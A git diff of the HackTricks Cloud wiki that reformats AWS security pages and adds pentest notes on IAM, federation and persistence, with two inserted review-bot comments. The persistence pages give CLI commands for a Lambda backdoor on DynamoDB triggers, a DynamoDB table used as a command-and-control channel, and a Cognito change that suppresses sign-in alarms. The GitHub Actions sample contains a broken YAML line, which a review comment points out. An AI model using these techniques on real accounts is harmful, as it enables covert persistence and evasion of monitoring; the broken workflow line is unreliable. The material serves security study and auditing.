-* [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
+- [**cs-suite**](https://github.com/SecurityFTW/cs-suite): Cloud Security Suite (uses python2.7 and looks unmaintained)
+- [**Zeus**](https://github.com/DenizParlak/Zeus): Zeus is a powerful tool for AWS EC2 / S3 / CloudTrail / CloudWatch / KMS best hardening practices (looks unmaintained). It checks only default configured creds inside the system.
 ### Constant Audit
-* [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
-* [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
-* [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. 
Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian is a rules engine for managing public cloud accounts and resources. It allows users to **define policies to enable a well managed cloud infrastructure**, that's both secure and cost optimized. It consolidates many of the adhoc scripts organizations have into a lightweight and flexible tool, with unified metrics and reporting.
+- [**pacbot**](https://github.com/tmobile/pacbot)**: Policy as Code Bot (PacBot)** is a platform for **continuous compliance monitoring, compliance reporting and security automation for the clou**d. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot **auto-fix** framework provides the ability to automatically respond to policy violations by taking predefined actions.
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert is a serverless, **real-time** data analysis framework which empowers you to **ingest, analyze, and alert** on data from any environment, u**sing data sources and alerting logic you define**. Computer security teams use StreamAlert to scan terabytes of log data every day for incident detection and response.
 ## DEBUG: Capture AWS cli requests
@@ -395,20 +383,7 @@ aws ... ## References -* [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) -* [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) +- [https://www.youtube.com/watch?v=8ZXRw4Ry3mQ](https://www.youtube.com/watch?v=8ZXRw4Ry3mQ) +- [https://cloudsecdocs.com/aws/defensive/tooling/audit/](https://cloudsecdocs.com/aws/defensive/tooling/audit/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md similarity index 78% rename from pentesting-cloud/aws-security/aws-basic-information/README.md rename to src/pentesting-cloud/aws-security/aws-basic-information/README.md index a02cb59a1..c86c8f3bb 100644 --- a/pentesting-cloud/aws-security/aws-basic-information/README.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md @@ -1,23 +1,10 @@ # AWS - Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Organization Hierarchy -![](<../../../.gitbook/assets/image (151).png>) +![](<../../../images/image (151).png>) ### Accounts 
@@ -27,19 +14,20 @@ This is very interesting from a **security** point of view, as **one account won Therefore, there are **two types of accounts in an organization** (we are talking about AWS accounts and not User accounts): a single account that is designated as the management account, and one or more member accounts. -* The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: +- The **management account (the root account)** is the account that you use to create the organization. From the organization's management account, you can do the following: - * Create accounts in the organization - * Invite other existing accounts to the organization - * Remove accounts from the organization - * Manage invitations - * Apply policies to entities (roots, OUs, or accounts) within the organization - * Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. - * It's possible to login as the root user using the email and password used to create this root account/organization. + - Create accounts in the organization + - Invite other existing accounts to the organization + - Remove accounts from the organization + - Manage invitations + - Apply policies to entities (roots, OUs, or accounts) within the organization + - Enable integration with supported AWS services to provide service functionality across all of the accounts in the organization. + - It's possible to login as the root user using the email and password used to create this root account/organization. - The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. -* **Member accounts** make up all of the rest of the accounts in an organization. 
An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. - * Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). + The management account has the **responsibilities of a payer account** and is responsible for paying all charges that are accrued by the member accounts. You can't change an organization's management account. + +- **Member accounts** make up all of the rest of the accounts in an organization. An account can be a member of only one organization at a time. You can attach a policy to an account to apply controls to only that one account. + - Member accounts **must use a valid email address** and can have a **name**, in general they wont be able to manage the billing (but they might be given access to it). ``` aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com 
@@ -61,25 +49,26 @@ A **service control policy (SCP)** is a policy that specifies the services and a This is the ONLY way that **even the root user can be stopped** from doing something. For example, it could be used to stop users from disabling CloudTrail or deleting backups.\ The only way to bypass this is to compromise also the **master account** that configures the SCPs (master account cannot be blocked). -{% hint style="warning" %} -Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. -{% endhint %} +> [!WARNING] +> Note that **SCPs only restrict the principals in the account**, so other accounts are not affected. This means having an SCP deny `s3:GetObject` will not stop people from **accessing a public S3 bucket** in your account. SCP examples: -* Deny the root account entirely -* Only allow specific regions -* Only allow white-listed services -* Deny GuardDuty, CloudTrail, and S3 Public Block Access from +- Deny the root account entirely +- Only allow specific regions +- Only allow white-listed services +- Deny GuardDuty, CloudTrail, and S3 Public Block Access from - being disabled -* Deny security/incident response roles from being deleted or + being disabled - modified. -* Deny backups from being deleted. -* Deny creating IAM users and access keys +- Deny security/incident response roles from being deleted or -Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_manage\_policies\_scps\_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) + modified. + +- Deny backups from being deleted. 
+- Deny creating IAM users and access keys + +Find **JSON examples** in [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_manage_policies_scps_examples.html) ### ARN @@ -92,18 +81,18 @@ arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env Note that there are 4 partitions in AWS but only 3 ways to call them: -* AWS Standard: `aws` -* AWS China: `aws-cn` -* AWS US public Internet (GovCloud): `aws-us-gov` -* AWS Secret (US Classified): `aws` +- AWS Standard: `aws` +- AWS China: `aws-cn` +- AWS US public Internet (GovCloud): `aws-us-gov` +- AWS Secret (US Classified): `aws` ## IAM - Identity and Access Management IAM is the service that will allow you to manage **Authentication**, **Authorization** and **Access Control** inside your AWS account. -* **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. -* **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. -* **Access Control** - The method and process of how access is granted to a secure resource +- **Authentication** - Process of defining an identity and the verification of that identity. This process can be subdivided in: Identification and verification. +- **Authorization** - Determines what an identity can access within a system once it's been authenticated to it. +- **Access Control** - The method and process of how access is granted to a secure resource IAM can be defined by its ability to manage, control and govern authentication, authorization and access control mechanisms of identities to your resources within your AWS account. 
@@ -125,8 +114,8 @@ Users can have **MFA enabled to login** through the console. API tokens of MFA e #### CLI -* **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT -* **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). +- **Access Key ID**: 20 random uppercase alphanumeric characters like AKHDNAPO86BSHKDIRYT +- **Secret access key ID**: 40 random upper and lowercase characters: S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU (It's not possible to retrieve lost secret access key IDs). Whenever you need to **change the Access Key** this is the process you should follow:\ &#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_ @@ -138,9 +127,9 @@ You can use a **free virtual application or a physical device**. You can use app Policies with MFA conditions can be attached to the following: -* An IAM user or group -* A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic -* The trust policy of an IAM role that can be assumed by a user +- An IAM user or group +- A resource such as an Amazon S3 bucket, Amazon SQS queue, or Amazon SNS topic +- The trust policy of an IAM role that can be assumed by a user If you want to **access via CLI** a resource that **checks for MFA** you need to call **`GetSessionToken`**. That will give you a token with info about MFA.\ Note that **`AssumeRole` credentials don't contain this information**. 
@@ -159,10 +148,10 @@ You can attach an **identity-based policy to a user group** so that all of the * Here are some important characteristics of user groups: -* A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. -* **User groups can't be nested**; they can contain only users, not other user groups. -* There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. -* The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). +- A user **group** can **contain many users**, and a **user** can **belong to multiple groups**. +- **User groups can't be nested**; they can contain only users, not other user groups. +- There is **no default user group that automatically includes all users in the AWS account**. If you want to have a user group like that, you must create it and assign each new user to it. +- The number and size of IAM resources in an AWS account, such as the number of groups, and the number of groups that a user can be a member of, are limited. For more information, see [IAM and AWS STS quotas](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_iam-quotas.html). ### [IAM roles](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles.html) 
@@ -184,8 +173,8 @@ AWS Security Token Service (STS) is a web service that facilitates the **issuanc Are used to assign permissions. There are 2 types: -* AWS managed policies (preconfigured by AWS) -* Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. +- AWS managed policies (preconfigured by AWS) +- Customer Managed Policies: Configured by you. You can create policies based on AWS managed policies (modifying one of them and creating your own), using the policy generator (a GUI view that helps you granting and denying permissions) or writing your own.. By **default access** is **denied**, access will be granted if an explicit role has been specified.\ If **single "Deny" exist, it will override the "Allow"**, except for requests that use the AWS account's root security credentials (which are allowed by default). @@ -200,7 +189,7 @@ If **single "Deny" exist, it will override the "Allow"**, except for requests th "Action": [ //Actions that will be allowed or denied "ec2:AttachVolume", "ec2:DetachVolume" - ], + ], "Resource": [ //Resource the action and effect will be applied to "arn:aws:ec2:*:*:volume/*", "arn:aws:ec2:*:*:instance/*" @@ -262,7 +251,7 @@ To configure this trust, an **IAM Identity Provider is generated (SAML or OAuth) However, you will usually want to give a **different role depending on the group of the user** in the third party platform. Then, several **IAM roles can trust** the third party Identity Provider and the third party platform will be the one allowing users to assume one role or the other. -
+
### IAM Identity Center @@ -272,11 +261,11 @@ The login domain is going to be something like `.awsapps.com`. To login users, there are 3 identity sources that can be used: -* Identity Center Directory: Regular AWS users -* Active Directory: Supports different connectors -* External Identity Provider: All users and groups come from an external Identity Provider (IdP) +- Identity Center Directory: Regular AWS users +- Active Directory: Supports different connectors +- External Identity Provider: All users and groups come from an external Identity Provider (IdP) -
+
In the simplest case of Identity Center directory, the **Identity Center will have a list of users & groups** and will be able to **assign policies** to them to **any of the accounts** of the organization. @@ -297,13 +286,13 @@ It's recommended to **specify the user who is trusted and not put some generic t Not supported: -* Trust Relations -* AD Admin Center -* Full PS API support -* AD Recycle Bin -* Group Managed Service Accounts -* Schema Extensions -* No Direct access to OS or Instances +- Trust Relations +- AD Admin Center +- Full PS API support +- AD Recycle Bin +- Group Managed Service Accounts +- Schema Extensions +- No Direct access to OS or Instances #### Web Federation or OpenID Authentication @@ -311,8 +300,8 @@ The app uses the AssumeRoleWithWebIdentity to create temporary credentials. Howe ### Other IAM options -* You can **set a password policy setting** options like minimum length and password requirements. -* You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. +- You can **set a password policy setting** options like minimum length and password requirements. +- You can **download "Credential Report"** with information about current credentials (like user creation time, is password enabled...). You can generate a credential report as often as once every **four hours**. AWS Identity and Access Management (IAM) provides **fine-grained access control** across all of AWS. With IAM, you can specify **who can access which services and resources**, and under which conditions. With IAM policies, you manage permissions to your workforce and systems to **ensure least-privilege permissions**. 
@@ -338,14 +327,14 @@ In [**this page**](https://docs.aws.amazon.com/IAM/latest/UserGuide/reference_id The following privileges grant various read access of metadata: -* `arn:aws:iam::aws:policy/SecurityAudit` -* `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` -* `codebuild:ListProjects` -* `config:Describe*` -* `cloudformation:ListStacks` -* `logs:DescribeMetricFilters` -* `directconnect:DescribeConnections` -* `dynamodb:ListTables` +- `arn:aws:iam::aws:policy/SecurityAudit` +- `arn:aws:iam::aws:policy/job-function/ViewOnlyAccess` +- `codebuild:ListProjects` +- `config:Describe*` +- `cloudformation:ListStacks` +- `logs:DescribeMetricFilters` +- `directconnect:DescribeConnections` +- `dynamodb:ListTables` ## Misc @@ -390,21 +379,8 @@ If you are looking for something **similar** to this but for the **browser** you ## References -* [https://docs.aws.amazon.com/organizations/latest/userguide/orgs\_getting-started\_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) -* [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) -* [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) +- [https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html](https://docs.aws.amazon.com/organizations/latest/userguide/orgs_getting-started_concepts.html) +- [https://aws.amazon.com/iam/](https://aws.amazon.com/iam/) +- [https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html](https://docs.aws.amazon.com/singlesignon/latest/userguide/what-is.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md similarity index 53% rename from pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md rename to src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md index e4f155bd0..6e25b21fe 100644 --- a/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md +++ b/src/pentesting-cloud/aws-security/aws-basic-information/aws-federation-abuse.md @@ -1,25 +1,14 @@ # AWS - Federation Abuse -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## SAML For info about SAML please check: -{% embed url="https://book.hacktricks.xyz/pentesting-web/saml-attacks" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/saml-attacks +{{#endref}} In order to configure an **Identity Federation through SAML** you just need to provide a **name** and the **metadata XML** containing all the SAML configuration (**endpoints**, **certificate** with public key) @@ -32,7 +21,7 @@ In order to add a github action as Identity provider: 3. Click on _Get thumbprint_ to get the thumbprint of the provider 4. For _Audience_, enter `sts.amazonaws.com` 5. Create a **new role** with the **permissions** the github action need and a **trust policy** that trust the provider like: - * ```json + - ```json { "Version": "2012-10-17", "Statement": [ @@ -60,33 +49,33 @@ In order to add a github action as Identity provider: 8. Finally use a github action to configure the AWS creds to be used by the workflow: ```yaml -name: 'test AWS Access' - +name: "test AWS Access" + # The workflow should only trigger on pull requests to the main branch on: pull_request: branches: - main - + # Required to get the ID Token that will be used for OIDC permissions: id-token: write contents: read # needed for private repos to checkout - + jobs: aws: runs-on: ubuntu-latest steps: - name: Checkout uses: actions/checkout@v3 - + - name: Configure AWS Credentials uses: aws-actions/configure-aws-credentials@v1 with: aws-region: eu-west-1 - role-to-assume: ${{ secrets.READ_ROLE }} + role-to-assume:${{ secrets.READ_ROLE }} role-session-name: OIDCSession - + - run: aws sts get-caller-identity shell: bash ``` 
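Review bot: The GitHub Actions sample in this hunk now reads `role-to-assume:${{ secrets.READ_ROLE }}` with the space after the colon dropped; a YAML mapping entry needs `: ` with a space, so this line is no longer a key/value pair and the `with:` block of the `aws-actions/configure-aws-credentials` step stops parsing, meaning readers who copy the snippet get a workflow that cannot assume the role. Restore `        role-to-assume: ${{ secrets.READ_ROLE }}`. The surrounding edits in the block (double quotes on the `name` value, trailing-whitespace cleanup) look intentional and are fine.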
@@ -107,21 +96,21 @@ It's possible to generate **OIDC providers** in an **EKS** cluster simply by set ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Principal": { - "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" - }, - "Action": "sts:AssumeRoleWithWebIdentity", - "Condition": { - "StringEquals": { - "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" - } - } + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "Federated": "arn:aws:iam::123456789098:oidc-provider/oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B" + }, + "Action": "sts:AssumeRoleWithWebIdentity", + "Condition": { + "StringEquals": { + "oidc.eks.us-east-1.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:aud": "sts.amazonaws.com" } - ] + } + } + ] } ``` 
@@ -129,27 +118,12 @@ This policy is correctly indicating than **only** the **EKS cluster** with **id* In order to specify **which service account should be able to assume the role,** it's needed to specify a **condition** where the **service account name is specified**, such as: -{% code overflow="wrap" %} ```bash "oidc.eks.region-code.amazonaws.com/id/20C159CDF6F2349B68846BEC03BE031B:sub": "system:serviceaccount:default:my-service-account", ``` -{% endcode %} ## References -* [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) +- [https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/](https://www.eliasbrange.dev/posts/secure-aws-deploys-from-github-actions-with-oidc/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md new file mode 100644 index 000000000..0135472a0 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-permissions-for-a-pentest.md @@ -0,0 +1,17 @@ +# AWS - Permissions for a Pentest + +{{#include ../../banners/hacktricks-training.md}} + +These are the permissions you need on each AWS account you want to audit to be able to run all the proposed AWS audit tools: + +- The default policy **arn:aws:iam::aws:policy/**[**ReadOnlyAccess**](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/ReadOnlyAccess) +- To run [aws_iam_review](https://github.com/carlospolop/aws_iam_review) you also need the permissions: + - **access-analyzer:List\*** + - **access-analyzer:Get\*** + - **iam:CreateServiceLinkedRole** + - **access-analyzer:CreateAnalyzer** + - Optional if the client generates the analyzers for you, but usually it's easier just to ask for this permission) + - **access-analyzer:DeleteAnalyzer** + - Optional if the client removes the analyzers for you, but usually it's easier just to ask for this permission) + +{{#include ../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-persistence/README.md b/src/pentesting-cloud/aws-security/aws-persistence/README.md similarity index 100% rename from pentesting-cloud/aws-security/aws-persistence/README.md rename to src/pentesting-cloud/aws-security/aws-persistence/README.md diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md new file mode 100644 index 000000000..2026f7c2f --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-api-gateway-persistence.md 
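Review bot: The permission list in the new aws-permissions-for-a-pentest.md grants `iam:CreateServiceLinkedRole` unconditionally alongside the Access Analyzer actions; since the only stated reason for it is creating analyzers, it would be worth adding that the grant can be scoped with the condition `"iam:AWSServiceName": "access-analyzer.amazonaws.com"` so the audit principal stays read-only for every other service. The two "Optional if the client ... for you" sub-bullets each end with an unmatched `)`; either open the parenthesis before "Optional" or drop the trailing one.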
@@ -0,0 +1,32 @@ +# AWS - API Gateway Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## API Gateway + +For more information go to: + +{{#ref}} +../aws-services/aws-api-gateway-enum.md +{{#endref}} + +### Resource Policy + +Modify the resource policy of the API gateway(s) to grant yourself access to them + +### Modify Lambda Authorizers + +Modify the code of lambda authorizers to grant yourself access to all the endpoints.\ +Or just remove the use of the authorizer. + +### IAM Permissions + +If a resource is using IAM authorizer you could give yourself access to it modifying IAM permissions.\ +Or just remove the use of the authorizer. + +### API Keys + +If API keys are used, you could leak them to maintain persistence or even create new ones.\ +Or just remove the use of API keys. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md new file mode 100644 index 000000000..0c7c000bb --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-cognito-persistence.md 
@@ -0,0 +1,42 @@ +# AWS - Cognito Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +## Cognito + +For more information, access: + +{{#ref}} +../aws-services/aws-cognito-enum/ +{{#endref}} + +### User persistence + +Cognito is a service that allows to give roles to unauthenticated and authenticated users and to control a directory of users. Several different configurations can be altered to maintain some persistence, like: + +- **Adding a User Pool** controlled by the user to an Identity Pool +- Give an **IAM role to an unauthenticated Identity Pool and allow Basic auth flow** + - Or to an **authenticated Identity Pool** if the attacker can login + - Or **improve the permissions** of the given roles +- **Create, verify & privesc** via attributes controlled users or new users in a **User Pool** +- **Allowing external Identity Providers** to login in a User Pool or in an Identity Pool + +Check how to do these actions in + +{{#ref}} +../aws-privilege-escalation/aws-cognito-privesc.md +{{#endref}} + +### `cognito-idp:SetRiskConfiguration` + +An attacker with this privilege could modify the risk configuration to be able to login as a Cognito user **without having alarms being triggered**. [**Check out the cli**](https://docs.aws.amazon.com/cli/latest/reference/cognito-idp/set-risk-configuration.html) to check all the options: + +```bash +aws cognito-idp set-risk-configuration --user-pool-id --compromised-credentials-risk-configuration EventFilter=SIGN_UP,Actions={EventAction=NO_ACTION} +``` + +By default this is disabled: + +
+ +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md new file mode 100644 index 000000000..e37a874e8 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-dynamodb-persistence.md 
@@ -0,0 +1,63 @@ +# AWS - DynamoDB Persistence + +{{#include ../../../banners/hacktricks-training.md}} + +### DynamoDB + +For more information access: + +{{#ref}} +../aws-services/aws-dynamodb-enum.md +{{#endref}} + +### DynamoDB Triggers with Lambda Backdoor + +Using DynamoDB triggers, an attacker can create a **stealthy backdoor** by associating a malicious Lambda function with a table. The Lambda function can be triggered when an item is added, modified, or deleted, allowing the attacker to execute arbitrary code within the AWS account. + +```bash +# Create a malicious Lambda function +aws lambda create-function \ + --function-name MaliciousFunction \ + --runtime nodejs14.x \ + --role \ + --handler index.handler \ + --zip-file fileb://malicious_function.zip \ + --region + +# Associate the Lambda function with the DynamoDB table as a trigger +aws dynamodbstreams describe-stream \ + --table-name TargetTable \ + --region + +# Note the "StreamArn" from the output +aws lambda create-event-source-mapping \ + --function-name MaliciousFunction \ + --event-source \ + --region +``` + +To maintain persistence, the attacker can create or modify items in the DynamoDB table, which will trigger the malicious Lambda function. This allows the attacker to execute code within the AWS account without direct interaction with the Lambda function. + +### DynamoDB as a C2 Channel + +An attacker can use a DynamoDB table as a **command and control (C2) channel** by creating items containing commands and using compromised instances or Lambda functions to fetch and execute these commands. 
+ +```bash +# Create a DynamoDB table for C2 +aws dynamodb create-table \ + --table-name C2Table \ + --attribute-definitions AttributeName=CommandId,AttributeType=S \ + --key-schema AttributeName=CommandId,KeyType=HASH \ + --provisioned-throughput ReadCapacityUnits=5,WriteCapacityUnits=5 \ + --region + +# Insert a command into the table +aws dynamodb put-item \ + --table-name C2Table \ + --item '{"CommandId": {"S": "cmd1"}, "Command": {"S": "malicious_command"}}' \ + --region +``` + +The compromised instances or Lambda functions can periodically check the C2 table for new commands, execute them, and optionally report the results back to the table. This allows the attacker to maintain persistence and control over the compromised resources. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md new file mode 100644 index 000000000..4c87fda79 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ec2-persistence.md 
